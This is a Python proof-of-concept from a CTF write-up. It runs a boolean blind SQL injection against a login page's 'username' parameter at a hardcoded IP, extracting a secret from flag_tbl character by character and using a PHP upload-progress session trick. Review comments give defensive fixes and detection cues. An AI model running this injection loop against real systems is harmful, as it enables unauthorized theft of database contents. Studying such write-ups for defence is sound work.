import requests
# CTF write-up proof of concept: boolean-based blind SQL injection through the
# `username` query parameter of templates/login.php. Each request asks one
# yes/no question ("is character N of the secret equal to ASCII code C?") and
# reads the answer from the response text.
#
# NOTE(review): the injected double quote suggests the login query places
# `username` inside a double-quoted SQL string built by concatenation; confirm
# against the challenge source. A parameterized query removes this oracle.
#
# Defender's view: the probing is noisy. Every recovered character costs up to
# 96 requests whose query strings contain `ascii(substr(`, and the script has
# no stop condition, so it keeps probing up to position 9999. Request-rate
# limits and access-log rules on SQL function names in parameters will see it.

result = ''
url = 'http://137.117.210.176:13372/'

# Multipart body carrying a field named PHP_SESSION_UPLOAD_PROGRESS, sent with
# a fixed PHPSESSID cookie.
# NOTE(review): presumably this relies on PHP's upload-progress tracking to get
# session data created for the request; the write-up does not say, so confirm.
# If the feature is unused, `session.upload_progress.enabled = Off` in php.ini
# removes that behaviour.
data = '''------WebKitFormBoundary8Jltb5vw5fWfSYS4
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
asdfasdfasdf
------WebKitFormBoundary8Jltb5vw5fWfSYS4--'''

headers = {
    'Cookie': 'PHPSESSID=yelang123;',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary8Jltb5vw5fWfSYS4',
}

# {0} is the candidate ASCII code, {1} the 1-based character position.
query_template = "templates/login.php?username=1\"or if(ascii(substr((select group_concat(secret) from flag_tbl),{1},1))={0},1,0)%23&password=tlqkf12a"

for position in range(1, 10000):
    for code in range(32, 128):
        payload = query_template.format(code, position)
        r = requests.post(url + payload, headers=headers, data=data)
        # "Try again!" in the page means the injected condition was false.
        if "Try again!" in r.text:
            continue
        result += chr(code)
        print(result)
        break

print(result)